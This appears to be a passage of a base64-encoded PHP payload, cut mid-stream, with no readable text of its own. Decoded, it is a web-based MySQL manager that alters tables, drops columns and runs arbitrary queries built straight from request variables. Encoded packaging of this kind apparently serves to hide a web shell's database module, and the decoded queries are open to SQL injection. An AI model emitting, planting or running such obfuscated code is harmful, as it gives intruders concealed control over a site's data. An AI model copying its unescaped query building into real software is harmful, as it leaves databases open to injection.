NCjx0ZD4mbmJzcDwvdGQ+DQo8dGQ+Jm5ic3A8L3RkPg0KPC90cj4NCjx0cj4NCjx0ZD48aW5wdXQgdHlwZT1yYWRpbyBuYW1lPXR5cGUgdmFsdWU9IkNIQVIiICc7IGlmKCAkdHlwZSA9PSAiY2hhciIgKSBlY2hvICJjaGVja2VkIjtlY2hvICc+Q0hBUjwvdGQ+DQo8dGQgYWxpZ249Y2VudGVyPk88L3RkPg0KPHRkPiZuYnNwPC90ZD4NCjx0ZD4mbmJzcDwvdGQ+DQo8dGQ+Jm5ic3A8L3RkPg0KPHRkIGFsaWduPWNlbnRlcj5PPC90ZD4NCjwvdHI+DQo8dHI+DQo8dGQ+PGlucHV0IHR5cGU9cmFkaW8gbmFtZT10eXBlIHZhbHVlPSJWQVJDSEFSIiAnOyBpZiggJHR5cGUgPT0gInZhcmNoYXIiICkgZWNobyAiY2hlY2tlZCI7ZWNobyAnPlZBUkNIQVI8L3RkPg0KPHRkIGFsaWduPWNlbnRlcj5PPC90ZD4NCjx0ZD4mbmJzcDwvdGQ+DQo8dGQ+Jm5ic3A8L3RkPg0KPHRkPiZuYnNwPC90ZD4NCjx0ZCBhbGlnbj1jZW50ZXI+TzwvdGQ+DQo8L3RyPg0KPHRyPg0KPHRkPjxpbnB1dCB0eXBlPXJhZGlvIG5hbWU9dHlwZSB2YWx1ZT0iVElOWVRFWFQiICc7IGlmKCAkdHlwZSA9PSAidGlueXRleHQiICkgZWNobyAiY2hlY2tlZCI7ZWNobyAnPlRJTllURVhUICgwIH4gMjU1KTwvdGQ+DQo8dGQ+Jm5ic3A8L3RkPg0KPHRkPiZuYnNwPC90ZD4NCjx0ZD4mbmJzcDwvdGQ+DQo8dGQ+Jm5ic3A8L3RkPg0KPHRkPiZuYnNwPC90ZD4NCjwvdHI+DQo8dHI+DQo8dGQ+PGlucHV0IHR5cGU9cmFkaW8gbmFtZT10eXBlIHZhbHVlPSJURVhUIiAnOyBpZiggJHR5cGUgPT0gInRleHQiICkgZWNobyAiY2hlY2tlZCI7ZWNobyAnPlRFWFQgKDAgfiA2NTUzNSk8L3RkPg0KPHRkPiZuYnNwPC90ZD4NCjx0ZD4mbmJzcDwvdGQ+DQo8dGQ+Jm5ic3A8L3RkPg0KPHRkPiZuYnNwPC90ZD4NCjx0ZD4mbmJzcDwvdGQ+DQo8L3RyPg0KPHRyPg0KPHRkPjxpbnB1dCB0eXBlPXJhZGlvIG5hbWU9dHlwZSB2YWx1ZT0iTUVESVVNVEVYVCIgJzsgaWYoICR0eXBlID09ICJtZWRpdW10ZXh0IiApIGVjaG8gImNoZWNrZWQiO2VjaG8gJz5NRURJVU1URVhUICgwIH4gMTY3NzcyMTUpPC90ZD4NCjx0ZD4mbmJzcDwvdGQ+DQo8dGQ+Jm5ic3A8L3RkPg0KPHRkPiZuYnNwPC90ZD4NCjx0ZD4mbmJzcDwvdGQ+DQo8dGQ+Jm5ic3A8L3RkPg0KPC90cj4NCjx0cj4NCjx0ZD48aW5wdXQgdHlwZT1yYWRpbyBuYW1lPXR5cGUgdmFsdWU9IkxPTkdURVhUIiAnOyBpZiggJHR5cGUgPT0gImxvbmd0ZXh0IiApIGVjaG8gImNoZWNrZWQiO2VjaG8gJz5MT05HVEVYVCAoMCB+IDQyOTQ5NjcyOTUpPC90ZD4NCjx0ZD4mbmJzcDwvdGQ+DQo8dGQ+Jm5ic3A8L3RkPg0KPHRkPiZuYnNwPC90ZD4NCjx0ZD4mbmJzcDwvdGQ+DQo8dGQ+Jm5ic3A8L3RkPg0KPC90cj4NCjx0cj4NCjx0ZD48aW5wdXQgdHlwZT1yYWRpbyBuYW1lPXR5cGUgdmFsdWU9IlRJTllCTE9CIiAnOyBpZiggJHR5cGUgPT0gInRpbnlibG9iIiApIGVjaG8gImNoZWNrZWQiO2VjaG8gJz5USU5ZQkxPQiAoMCB+IDI1NSk8L3RkPg0KPHRkPiZuYnNwPC90ZD4NCjx0ZD4mbmJzcDwvdGQ+DQo8dGQ+Jm5ic3A8L3RkPg0KPHRkPiZuYnNwPC90ZD4NCjx0ZD4mbmJzcDwvdGQ+DQo8L3RyPg0KPHRyPg0KPHRkPjxpbnB1dCB0eXBlPXJhZGlvIG5hbWU9dHlwZSB2YWx1ZT0iQkxPQiIgJzsgaWYoICR0eXBlID09ICJibG9iIiApIGVjaG8gImNoZWNrZWQiO2VjaG8gJz5CTE9CICgwIH4gNjU1MzUpPC90ZD4NCjx0ZD4mbmJzcDwvdGQ+DQo8dGQ+Jm5ic3A8L3RkPg0KPHRkPiZuYnNwPC90ZD4NCjx0ZD4mbmJzcDwvdGQ+DQo8dGQ+Jm5ic3A8L3RkPg0KPC90cj4NCjx0cj4NCjx0ZD48aW5wdXQgdHlwZT1yYWRpbyBuYW1lPXR5cGUgdmFsdWU9Ik1FRElVTUJMT0IiICc7IGlmKCAkdHlwZSA9PSAibWVkaXVtYmxvYiIgKSBlY2hvICJjaGVja2VkIjtlY2hvICc+TUVESVVNQkxPQiAoMCB+IDE2Nzc3MjE1KTwvdGQ+DQo8dGQ+Jm5ic3A8L3RkPg0KPHRkPiZuYnNwPC90ZD4NCjx0ZD4mbmJzcDwvdGQ+DQo8dGQ+Jm5ic3A8L3RkPg0KPHRkPiZuYnNwPC90ZD4NCjwvdHI+DQo8dHI+DQo8dGQ+PGlucHV0IHR5cGU9cmFkaW8gbmFtZT10eXBlIHZhbHVlPSJMT05HQkxPQiIgJzsgaWYoICR0eXBlID09ICJsb25nYmxvYiIgKSBlY2hvICJjaGVja2VkIjtlY2hvICc+TE9OR0JMT0IgKDAgfiA0Mjk0OTY3Mjk1KTwvdGQ+DQo8dGQ+Jm5ic3A8L3RkPg0KPHRkPiZuYnNwPC90ZD4NCjx0ZD4mbmJzcDwvdGQ+DQo8dGQ+Jm5ic3A8L3RkPg0KPHRkPiZuYnNwPC90ZD4NCjwvdHI+DQo8dHI+DQo8dGQ+PGlucHV0IHR5cGU9cmFkaW8gbmFtZT10eXBlIHZhbHVlPSJFTlVNIiAnOyBpZiggJHR5cGUgPT0gImVudW0iICkgZWNobyAiY2hlY2tlZCI7ZWNobyAnPkVOVU08L3RkPg0KPHRkIGNvbHNwYW49NT48Y2VudGVyPnZhbHVlIGxpc3Q8L2NlbnRlcj48L3RkPg0KPC90cj4NCjx0cj4NCjx0ZD48aW5wdXQgdHlwZT1yYWRpbyBuYW1lPXR5cGUgdmFsdWU9IlNFVCIgJzsgaWYoICR0eXBlID09ICJzZXQiICkgZWNobyAiY2hlY2tlZCI7ZWNobyAnPlNFVDwvdGQ+DQo8dGQgY29sc3Bhbj01PjxjZW50ZXI+dmFsdWUgbGlzdDwvY2VudGVyPjwvdGQ+DQo8L3RyPg0KPC90YWJsZT4NCjx0YWJsZT4NCjx0cj48dGg+TTwvdGg+PHRoPkQ8L3RoPjx0aD51bnNpZ25lZDwvdGg+PHRoPnplcm9maWxsPC90aD48dGg+YmluYXJ5PC90aD48dGg+dmFsdWUgbGlzdCAoZXg6IFwnYXBwbGVcJywgXCdvcmFuZ2VcJywgXCdiYW5hbmFcJykgPC90aD48L3RyPg0KPHRyPg0KPHRkIGFsaWduPWNlbnRlcj48aW5wdXQgdHlwZT10ZXh0IHNpemU9NCBuYW1lPU0gJzsgaWYoICRNICE9ICIiICkgZWNobyAidmFsdWU9JE0iO2VjaG8gJz48L3RkPg0KPHRkIGFsaWduPWNlbnRlcj48aW5wdXQgdHlwZT10ZXh0IHNpemU9NCBuYW1lPUQgJzsgaWYoICREICE9ICIiICkgZWNobyAidmFsdWU9JEQiO2VjaG8gJz48L3RkPg0KPHRkIGFsaWduPWNlbnRlcj48aW5wdXQgdHlwZT1jaGVja2JveCBuYW1lPXVuc2lnbmVkIHZhbHVlPSJVTlNJR05FRCIgJzsgaWYoIHN0cnBvcyggJGZpZWxkdHlwZSwgInVuc2lnbmVkIiApICkgZWNobyAiY2hlY2tlZCI7ZWNobyAnPjwvdGQ+DQo8dGQgYWxpZ249Y2VudGVyPjxpbnB1dCB0eXBlPWNoZWNrYm94IG5hbWU9emVyb2ZpbGwgdmFsdWU9IlpFUk9GSUxMIiAnOyBpZiggc3RycG9zKCAkZmllbGR0eXBlLCAiemVyb2ZpbGwiICkgKSBlY2hvICJjaGVja2VkIjtlY2hvICc+PC90ZD4NCjx0ZCBhbGlnbj1jZW50ZXI+PGlucHV0IHR5cGU9Y2hlY2tib3ggbmFtZT1iaW5hcnkgdmFsdWU9IkJJTkFSWSIgJzsgaWYoIHN0cnBvcyggJGZpZWxkdHlwZSwgImJpbmFyeSIgKSAgKSBlY2hvICJjaGVja2VkIjtlY2hvICc+PC90ZD4NCjx0ZCBhbGlnbj1jZW50ZXI+PGlucHV0IHR5cGU9dGV4dCBzaXplPTYwIG5hbWU9dmFsdWVsaXN0ICc7IGlmKCAkdmFsdWVsaXN0ICE9ICIiICkgZWNobyAidmFsdWU9XCIkdmFsdWVsaXN0XCIiO2VjaG8gJz48L3RkPg0KPC90cj4NCjwvdGFibGU+DQo8aDM+RmxhZ3M8L2gzPg0KPHRhYmxlPg0KPHRyPjx0aD5ub3QgbnVsbDwvdGg+PHRoPmRlZmF1bHQgdmFsdWU8L3RoPjx0aD5hdXRvIGluY3JlbWVudDwvdGg+PHRoPnByaW1hcnkga2V5PC90aD48L3RyPg0KPHRyPg0KPHRkIGFsaWduPWNlbnRlcj48aW5wdXQgdHlwZT1jaGVja2JveCBuYW1lPW5vdF9udWxsIHZhbHVlPSJOT1QgTlVMTCIgJzsgaWYoICRmaWVsZG51bGwgIT0gIllFUyIgKSBlY2hvICJjaGVja2VkIjtlY2hvICc+PC90ZD4NCjx0ZCBhbGlnbj1jZW50ZXI+PGlucHV0IHR5cGU9dGV4dCBuYW1lPWRlZmF1bHRfdmFsdWUgJzsgaWYoICRmaWVsZGRlZmF1bHQgIT0gIiIgKSBlY2hvICJ2YWx1ZT0kZmllbGRkZWZhdWx0IjtlY2hvICc+PC90ZD4NCjx0ZCBhbGlnbj1jZW50ZXI+PGlucHV0IHR5cGU9Y2hlY2tib3ggbmFtZT1hdXRvX2luY3JlbWVudCB2YWx1ZT0iQVVUT19JTkNSRU1FTlQiICc7IGlmKCAkZmllbGRleHRyYSA9PSAiYXV0b19pbmNyZW1lbnQiICkgZWNobyAiY2hlY2tlZCI7ZWNobyAnPjwvdGQ+DQo8dGQgYWxpZ249Y2VudGVyPjxpbnB1dCB0eXBlPWNoZWNrYm94IG5hbWU9cHJpbWFyeV9rZXkgdmFsdWU9IlBSSU1BUlkgS0VZIiAnOyBpZiggJGZpZWxka2V5ID09ICJQUkkiICkgZWNobyAiY2hlY2tlZCI7ZWNobyAnPjwvdGQ+DQo8L3RyPg0KPC90YWJsZT4NCjxwPic7DQoJaWYoICRjbWQgPT0gImFkZCIgKQ0KCQllY2hvICI8aW5wdXQgdHlwZT1zdWJtaXQgdmFsdWU9J0FkZCBGaWVsZCc+XG4iOw0KCWVsc2UgaWYoICRjbWQgPT0gImVkaXQiICkNCgkJZWNobyAiPGlucHV0IHR5cGU9c3VibWl0IHZhbHVlPSdFZGl0IEZpZWxkJz5cbiI7DQoJZWNobyAiPGlucHV0IHR5cGU9YnV0dG9uIHZhbHVlPUNhbmNlbCBvbkNsaWNrPSdoaXN0b3J5LmJhY2soKSc+XG4iOw0KCWVjaG8gIjwvZm9ybT5cbiI7DQp9DQoNCmZ1bmN0aW9uIG1hbmFnZUZpZWxkX3N1Ym1pdCggJGNtZCApIHsNCglnbG9iYWwgJG15c3FsSGFuZGxlLCAkZGJuYW1lLCAkdGFibGVuYW1lLCAkb2xkX25hbWUsICRuYW1lLCAkdHlwZSwgJFBIUF9TRUxGLCAkcXVlcnlTdHIsICRlcnJNc2csDQoJCSRNLCAkRCwgJHVuc2lnbmVkLCAkemVyb2ZpbGwsICRiaW5hcnksICRub3RfbnVsbCwgJGRlZmF1bHRfdmFsdWUsICRhdXRvX2luY3JlbWVudCwgJHByaW1hcnlfa2V5LCAkdmFsdWVsaXN0Ow0KCWlmKCAkY21kID09ICJhZGQiICkNCgkJJHF1ZXJ5U3RyID0gIkFMVEVSIFRBQkxFICR0YWJsZW5hbWUgQUREICRuYW1lICI7DQoJZWxzZSBpZiggJGNtZCA9PSAiZWRpdCIgKQ0KCQkkcXVlcnlTdHIgPSAiQUxURVIgVEFCTEUgJHRhYmxlbmFtZSBDSEFOR0UgJG9sZF9uYW1lICRuYW1lICI7DQoJaWYoICRNICE9ICIiICkNCgkJaWYoICREICE9ICIiICkNCgkJCSRxdWVyeVN0ciAuPSAiJHR5cGUoJE0sJEQpICI7DQoJCWVsc2UNCgkJCSRxdWVyeVN0ciAuPSAiJHR5cGUoJE0pICI7DQoJZWxzZSBpZiggJHZhbHVlbGlzdCAhPSAiIiApIHsNCgkJJHZhbHVlbGlzdCA9IHN0cmlwc2xhc2hlcyggJHZhbHVlbGlzdCApOw0KCQkkcXVlcnlTdHIgLj0gIiR0eXBlKCR2YWx1ZWxpc3QpICI7DQoJfSBlbHNlDQoJCSRxdWVyeVN0ciAuPSAiJHR5cGUgIjsNCgkkcXVlcnlTdHIgLj0gIiR1bnNpZ25lZCAkemVyb2ZpbGwgJGJpbmFyeSAiOw0KCWlmKCAkZGVmYXVsdF92YWx1ZSAhPSAiIiApDQoJCSRxdWVyeVN0ciAuPSAiREVGQVVMVCAnJGRlZmF1bHRfdmFsdWUnICI7DQoJJHF1ZXJ5U3RyIC49ICIkbm90X251bGwgJGF1dG9faW5jcmVtZW50IjsNCglteXNxbF9zZWxlY3RfZGIoICRkYm5hbWUsICRteXNxbEhhbmRsZSApOw0KCW15c3FsX3F1ZXJ5KCAkcXVlcnlTdHIsICRteXNxbEhhbmRsZSApOw0KCSRlcnJNc2cgPSBteXNxbF9lcnJvcigpOw0KCS8vIGtleSBjaGFuZ2UNCgkka2V5Q2hhbmdlID0gZmFsc2U7DQoJJHJlc3VsdCA9IG15c3FsX3F1ZXJ5KCAiU0hPVyBLRVlTIEZST00gJHRhYmxlbmFtZSIgKTsNCgkkcHJpbWFyeSA9ICIiOw0KCXdoaWxlKCAkcm93ID0gbXlzcWxfZmV0Y2hfYXJyYXkoJHJlc3VsdCkgKQ0KCQlpZiggJHJvd1siS2V5X25hbWUiXSA9PSAiUFJJTUFSWSIgKSB7DQoJCQlpZiggJHJvd1tDb2x1bW5fbmFtZV0gPT0gJG5hbWUgKQ0KCQkJCSRrZXlDaGFuZ2UgPSB0cnVlOw0KCQkJZWxzZQ0KCQkJCSRwcmltYXJ5IC49ICIsICRyb3dbQ29sdW1uX25hbWVdIjsNCgkJfQ0KCWlmKCAkcHJpbWFyeV9rZXkgPT0gIlBSSU1BUlkgS0VZIiApIHsNCgkJJHByaW1hcnkgLj0gIiwgJG5hbWUiOw0KCQkka2V5Q2hhbmdlID0gISRrZXlDaGFuZ2U7DQoJfQ0KCSRwcmltYXJ5ID0gc3Vic3RyKCAkcHJpbWFyeSwgMiApOw0KCWlmKCAka2V5Q2hhbmdlID09IHRydWUgKSB7DQoJCSRxID0gIkFMVEVSIFRBQkxFICR0YWJsZW5hbWUgRFJPUCBQUklNQVJZIEtFWSI7DQoJCW15c3FsX3F1ZXJ5KCAkcSApOw0KCQkkcXVlcnlTdHIgLj0gIjxicj5cbiIgLiAkcTsNCgkJJGVyck1zZyAuPSAiPGJyPlxuIiAuIG15c3FsX2Vycm9yKCk7DQoJCSRxID0gIkFMVEVSIFRBQkxFICR0YWJsZW5hbWUgQUREIFBSSU1BUlkgS0VZKCAkcHJpbWFyeSApIjsNCgkJbXlzcWxfcXVlcnkoICRxICk7DQoJCSRxdWVyeVN0ciAuPSAiPGJyPlxuIiAuICRxOw0KCQkkZXJyTXNnIC49ICI8YnI+XG4iIC4gbXlzcWxfZXJyb3IoKTsNCgl9DQoJdmlld1NjaGVtYSgpOw0KfQ0KDQpmdW5jdGlvbiBkcm9wRmllbGQoKSB7DQoJZ2xvYmFsICRteXNxbEhhbmRsZSwgJGRibmFtZSwgJHRhYmxlbmFtZSwgJGZpZWxkbmFtZSwgJFBIUF9TRUxGLCAkcXVlcnlTdHIsICRlcnJNc2c7DQoJJHF1ZXJ5U3RyID0gIkFMVEVSIFRBQkxFICR0YWJsZW5hbWUgRFJPUCBDT0xVTU4gJGZpZWxkbmFtZSI7DQoJbXlzcWxfc2VsZWN0X2RiKCAkZGJuYW1lLCAkbXlzcWxIYW5kbGUgKTsNCglteXNxbF9xdWVyeSggJHF1ZXJ5U3RyICwgJG15c3FsSGFuZGxlICk7DQoJJGVyck1zZyA9IG15c3FsX2Vycm9yKCk7DQoJdmlld1NjaGVtYSgpOw0KfQ0KDQpmdW5jdGlvbiB2aWV3RGF0YSggJHF1ZXJ5U3RyICkgew0KCWdsb2JhbCAkYWN0aW9uLCAkbXlzcWxIYW5kbGUsICRkYm5hbWUsICR0YWJsZW5hbWUsICRQSFBfU0VMRiwgJGVyck1zZywgJHBhZ2UsICRyb3dwZXJwYWdlLCAkb3JkZXJieTsNCgllY2hvICI8aDE+RGF0YSBpbiBUYWJsZTwvaDE+XG4iOw0KCWlmKCAkdGFibGVuYW1lICE9ICIiICkNCgkJZWNobyAiPHAgY2xhc3M9bG9jYXRpb24+JGRibmFtZSAmZ3Q7ICR0YWJsZW5hbWU8L3A+XG4iOw0KCWVsc2UNCgkJZWNobyAiPHAgY2xhc3M9bG9jYXRpb24+JGRibmFtZTwvcD5cbiI7DQoJJHF1ZXJ5U3RyID0gc3RyaXBzbGFzaGVzKCAkcXVlcnlTdHIgKTsNCglpZiggJHF1ZXJ5U3RyID09ICIiICkgew0KCQkkcXVlcnlTdHIgPSAiU0VMRUNUICogRlJPTSAkdGFibGVuYW1lIjsNCgkJaWYoICRvcmRlcmJ5ICE9ICIiICkNCgkJCSRxdWVyeVN0ciAuPSAiIE9SREVSIEJZICRvcmRlcmJ5IjsNCgkJZWNobyAiPGEgaHJlZj0nJFBIUF9TRUxGP2FjdGlvbj1hZGREYXRhJmRibmFtZT0kZGJuYW1lJnRhYmxlbmFtZT0kdGFibGVuYW1lJz5BZGQgRGF0YTwvYT4gfCBcbiI7DQoJCWVjaG8gIjxhIGhyZWY9JyRQSFBfU0VMRj9hY3Rpb249dmlld1NjaGVtYSZkYm5hbWU9JGRibmFtZSZ0YWJsZW5hbWU9JHRhYmxlbmFtZSc+U2NoZW1hPC9hPlxuIjsNCgl9DQoJJHBSZXN1bHQgPSBteXNxbF9kYl9xdWVyeSggJGRibmFtZSwgJHF1ZXJ5U3RyICk7DQoJJGZpZWxkdCA9IG15c3FsX2ZldGNoX2ZpZWxkKCRwUmVzdWx0KTsNCgkkdGFibGVuYW1lID0gJGZpZWxkdC0+dGFibGU7DQoJJGVyck1zZyA9IG15c3FsX2Vycm9yKCk7DQoJJEdMT0JBTFNbcXVlcnlTdHJdID0gJHF1ZXJ5U3RyOw0KCWlmKCAkcFJlc3VsdCA9PSBmYWxzZSApIHsNCgkJZWNob1F1ZXJ5UmVzdWx0KCk7DQoJCXJldHVybjsNCgl9DQoJaWYoICRwUmVzdWx0ID09IDEgKSB7DQoJCSRlcnJNc2cgPSAiU3VjY2VzcyI7DQoJCWVjaG9RdWVyeVJlc3VsdCgpOw0KCQlyZXR1cm47DQoJfQ0KCWVjaG8gIjxocj5cbiI7DQoJJHJvdyA9IG15c3FsX251bV9yb3dzKCAkcFJlc3VsdCApOw0KCSRjb2wgPSBteXNxbF9udW1fZmllbGRzKCAkcFJlc3VsdCApOw0KCWlmKCAkcm93ID09IDAgKSB7DQoJCWVjaG8gIk5vIERhdGEgRXhpc3QhIjsNCgkJcmV0dXJuOw0KCX0NCglpZiggJHJvd3BlcnBhZ2UgPT0gIiIgKSAkcm93cGVycGFnZSA9IDMwOw0KCWlmKCAkcGFnZSA9PSAiIiApICRwYWdlID0gMDsNCgllbHNlICRwYWdlLS07DQoJbXlzcWxfZGF0YV9zZWVrKCAkcFJlc3VsdCwgJHBhZ2UgKiAkcm93cGVycGFnZSApOw0KCWVjaG8gIjx0YWJsZSBjZWxsc3BhY2luZz0xIGNlbGxwYWRkaW5nPTI+XG4iOw0KCWVjaG8gIjx0cj5cbiI7DQoJZm9yKCAkaSA9IDA7ICRpIDwgJGNvbDsgJGkrKyApIHsNCgkJJGZpZWxkID0gbXlzcWxfZmV0Y2hfZmllbGQoICRwUmVzdWx0LCAkaSApOw0KCQllY2hvICI8dGg+IjsNCgkJaWYoJGFjdGlvbiA9PSAiZG1sbGQwUmhkR0U9IikNCgkJCWVjaG8gIjxhIGhyZWY9JyRQSFBfU0VMRj9hY3Rpb249ZG1sbGQwUmhkR0U9JmRibmFtZT0kZGJuYW1lJnRhYmxlbmFtZT0kdGFibGVuYW1lJm9yZGVyYnk9Ii4kZmllbGQtPm5hbWUuIic+Ii4kZmllbGQtPm5hbWUuIjwvYT5cbiI7DQoJCWVsc2UNCgkJCWVjaG8gJGZpZWxkLT5uYW1lLiJcbiI7DQoJCWVjaG8gIjwvdGg+XG4iOw0KCX0NCgllY2hvICI8dGggY29sc3Bhbj0yPkFjdGlvbjwvdGg+XG4iOw0KCWVjaG8gIjwvdHI+XG4iOw0KCWZvciggJGkgPSAwOyAkaSA8ICRyb3dwZXJwYWdlOyAkaSsrICkgew0KCQkkcm93QXJyYXkgPSBteXNxbF9mZXRjaF9yb3coICRwUmVzdWx0ICk7DQoJCWlmKCAkcm93QXJyYXkgPT0gZmFsc2UgKSBicmVhazsNCgkJZWNobyAiPHRyPlxuIjsNCgkJJGtleSA9ICIiOw0KCQlmb3IoICRqID0gMDsgJGogPCAkY29sOyAkaisrICkgew0KCQkJJGRhdGEgPSAkcm93QXJyYXlbJGpdOw0KCQkJJGZpZWxkID0gbXlzcWxfZmV0Y2hfZmllbGQoICRwUmVzdWx0LCAkaiApOw0KCQkJaWYoICRmaWVsZC0+cHJpbWFyeV9rZXkgPT0gMSApDQoJCQkJJGtleSAuPSAiJiIgLiAkZmllbGQtPm5hbWUgLiAiPSIgLiAkZGF0YTsNCgkJCWlmKCBzdHJsZW4oICRkYXRhICkgPiAzMCApDQoJCQkJJGRhdGEgPSBzdWJzdHIoICRkYXRhLCAwLCAzMCApIC4gIi4uLiI7DQoJCQkkZGF0YSA9IGh0bWxzcGVjaWFsY2hhcnMoICRkYXRhICk7DQoJCQllY2hvICI8dGQ+XG4iOw0KCQkJZWNobyAiJGRhdGFcbiI7DQoJCQllY2hvICI8L3RkPlxuIjsNCgkJfQ0KCQlpZiggJGtleSA9PSAiIiApDQoJCQllY2hvICI8dGQgY29sc3Bhbj0yPm5vIEtleTwvdGQ+XG4iOw0KCQllbHNlIHsNCgkJCWVjaG8gIjx0ZD48YSBocmVmPSckUEhQX1NFTEY/YWN0aW9uPWVkaXREYXRhJGtleSZkYm5hbWU9JGRibmFtZSZ0YWJsZW5hbWU9JHRhYmxlbmFtZSc+RWRpdDwvYT48L3RkPlxuIjsNCgkJCWVjaG8gIjx0ZD48YSBocmVmPSckUEhQX1NFTEY/YWN0aW9uPWRlbGV0ZURhdGEka2V5JmRibmFtZT0kZGJuYW1lJnRhYmxlbmFtZT0kdGFibGVuYW1lJyBvbkNsaWNrPVwicmV0dXJuIGNvbmZpcm0oJ0RlbGV0ZSBSb3c/JylcIj5EZWxldGU8L2E+PC90ZD5cbiI7DQoJCX0NCgkJZWNobyAiPC90cj5cbiI7DQoJfQ0KCWVjaG8gIjwvdGFibGU+XG4iOw0KCWVjaG8gIjxmb250IHNpemU9MiBjbGFzcz1cIm5ld1wiPlxuIjsNCglpZigkYWN0aW9uID09ICJkbWxsZDBSaGRHRT0iKQ0KCQllY2hvICI8Zm9ybSBhY3Rpb249JyRQSFBfU0VMRj9hY3Rpb249ZG1sbGQwUmhkR0U9JmRibmFtZT0kZGJuYW1lJnRhYmxlbmFtZT0kdGFibGVuYW1lJyBtZXRob2Q9cG9zdD5cbiI7DQoJZWxzZQ0KCQllY2hvICI8Zm9ybSBhY3Rpb249JyRQSFBfU0VMRj9hY3Rpb249cXVlcnkmZGJuYW1lPSRkYm5hbWUmdGFibGVuYW1lPSR0YWJsZW5hbWUmcXVlcnlTdHI9JHF1ZXJ5U3RyJyBtZXRob2Q9cG9zdD5cbiI7DQoJZWNobyAoJHBhZ2UrMSkuIi8iLihpbnQpKCRyb3cvJHJvd3BlcnBhZ2UrMSkuIiBwYWdlIjsNCgllY2hvICI8L2ZvbnQ+XG4iOw0KCWVjaG8gIiB8ICI7DQoJaWYoICRwYWdlID4gMCApIHsNCgkJaWYoJGFjdGlvbiA9PSAiZG1sbGQwUmhkR0U9IikNCgkJCWVjaG8gIjxhIGhyZWY9JyRQSFBfU0VMRj9hY3Rpb249ZG1sbGQwUmhkR0U9JmRibmFtZT0kZGJuYW1lJnRhYmxlbmFtZT0kdGFibGVuYW1lJnBhZ2U9Ii4oJHBhZ2UpOw0KCQllbHNlDQoJCQllY2hvICI8YSBocmVmPSckUEhQX1NFTEY/YWN0aW9uPXF1ZXJ5JmRibmFtZT0kZGJuYW1lJnRhYmxlbmFtZT0kdGFibGVuYW1lJnF1ZXJ5U3RyPSRxdWVyeVN0ciZwYWdlPSIuKCRwYWdlKTsNCgkJaWYoICRvcmRlcmJ5ICE9ICIiICYmICRhY3Rpb24gPT0gImRtbGxkMFJoZEdFPSIpDQoJCQllY2hvICImb3JkZXJieT0kb3JkZXJieSI7DQoJCWVjaG8gIic+UHJldjwvYT5cbiI7DQoJfSBlbHNlDQoJCWVjaG8gIjxmb250IHNpemU9MiBjbGFzcz1cIm5ld1wiPlByZXY8L2ZvbnQ+IjsNCgllY2hvICIgfCAiOw0KCWlmKCAkcGFnZSA8ICgkcm93LyRyb3dwZXJwYWdlKS0xICkgew0KCQlpZigkYWN0aW9uID09ICJkbWxsZDBSaGRHRT0iKQ0KCQkJZWNobyAiPGEgaHJlZj0nJFBIUF9TRUxGP2FjdGlvbj1kbWxsZDBSaGRHRT0mZGJuYW1lPSRkYm5hbWUmdGFibGVuYW1lPSR0YWJsZW5hbWUmcGFnZT0iLigkcGFnZSsyKTsNCgkJZWxzZQ0KCQkJZWNobyAiPGEgaHJlZj0nJFBIUF9TRUxGP2FjdGlvbj1xdWVyeSZkYm5hbWU9JGRibmFtZSZ0YWJsZW5hbWU9JHRhYmxlbmFtZSZxdWVyeVN0cj0kcXVlcnlTdHImcGFnZT0iLigkcGFnZSsyKTsNCgkJaWYoICRvcmRlcmJ5ICE9ICIiICYmICRhY3Rpb24gPT0gImRtbGxkMFJoZEdFPSIpDQoJCQllY2hvICImb3JkZXJieT0kb3JkZXJieSI7DQoJCWVjaG8gIic+TmV4dDwvYT5cbiI7DQoJfSBlbHNlDQoJCWVjaG8gIk5leHQiOw0KCWVjaG8gIiB8ICI7DQoJaWYoICRyb3cgPiAkcm93cGVycGFnZSApIHsNCgkJZWNobyAiPGlucHV0IHR5cGU9dGV4dCBzaXplPTQgbmFtZT1wYWdlPlxuIjsNCgkJZWNobyAiPGlucHV0IHR5cGU9c3VibWl0IHZhbHVlPSdHbyc+XG4iOw0KCX0NCgllY2hvICI8L2Zvcm0+XG4iOw0KCWVjaG8gIjwvZm9udD5cbiI7DQp9DQoNCmZ1bmN0aW9uIG1hbmFnZURhdGEoICRjbWQgKSB7DQoJZ2xvYmFsICRteXNxbEhhbmRsZSwgJGRibmFtZSwgJHRhYmxlbmFtZSwgJFBIUF9TRUxGOw0KCWlmKCAkY21kID09ICJhZGQiICkNCgkJZWNobyAiPGgxPkFkZCBEYXRhPC9oMT5cbiI7DQoJZWxzZSBpZiggJGNtZCA9PSAiZWRpdCIgKSB7DQoJCWVjaG8gIjxoMT5FZGl0IERhdGE8L2gxPlxuIjsNCgkJJHBSZXN1bHQgPSBteXNxbF9saXN0X2ZpZWxkcyggJGRibmFtZSwgJHRhYmxlbmFtZSApOw0KCQkkbnVtID0gbXlzcWxfbnVtX2ZpZWxkcyggJHBSZXN1bHQgKTsNCgkJJGtleSA9ICIiOw0KCQlmb3IoICRpID0gMDsgJGkgPCAkbnVtOyAkaSsrICkgew0KCQkJJGZpZWxkID0gbXlzcWxfZmV0Y2hfZmllbGQoICRwUmVzdWx0LCAkaSApOw0KCQkJaWYoICRmaWVsZC0+cHJpbWFyeV9rZXkgPT0gMSApDQoJCQkJaWYoICRmaWVsZC0+bnVtZXJpYyA9PSAxICkNCgkJCQkJJGtleSAuPSAkZmllbGQtPm5hbWUgLiAiPSIgLiAkR0xPQkFMU1skZmllbGQtPm5hbWVdIC4gIiBBTkQgIjsNCgkJCQllbHNlDQoJCQkJCSRrZXkgLj0gJGZpZWxkLT5uYW1lIC4gIj0nIiAuICRHTE9CQUxTWyRmaWVsZC0+bmFtZV0gLiAiJyBBTkQgIjsNCgkJfQ0KCQkka2V5ID0gc3Vic3RyKCAka2V5LCAwLCBzdHJsZW4oJGtleSktNCApOw0KCQlteXNxbF9zZWxlY3RfZGIoICRkYm5hbWUsICRteXNxbEhhbmRsZSApOw0KCQkkcFJlc3VsdCA9IG15c3FsX3F1ZXJ5KCAkcXVlcnlTdHIgPSAgIlNFTEVDVCAqIEZST00gJHRhYmxlbmFtZSBXSEVSRSAka2V5IiwgJG15c3FsSGFuZGxlICk7DQoJCSRkYXRhID0gbXlzcWxfZmV0Y2hfYXJyYXkoICRwUmVzdWx0ICk7DQoJfQ0KCWVjaG8gIjxwIGNsYXNzPWxvY2F0aW9uPiRkYm5hbWUgJmd0OyAkdGFibGVuYW1lPC9wPlxuIjsNCgllY2hvICI8Zm9ybSBhY3Rpb249JyRQSFBfU0VMRicgbWV0aG9kPXBvc3Q+XG4iOw0KCWlmKCAkY21kID09ICJhZGQiICkNCgkJZWNobyAiPGlucHV0IHR5cGU9a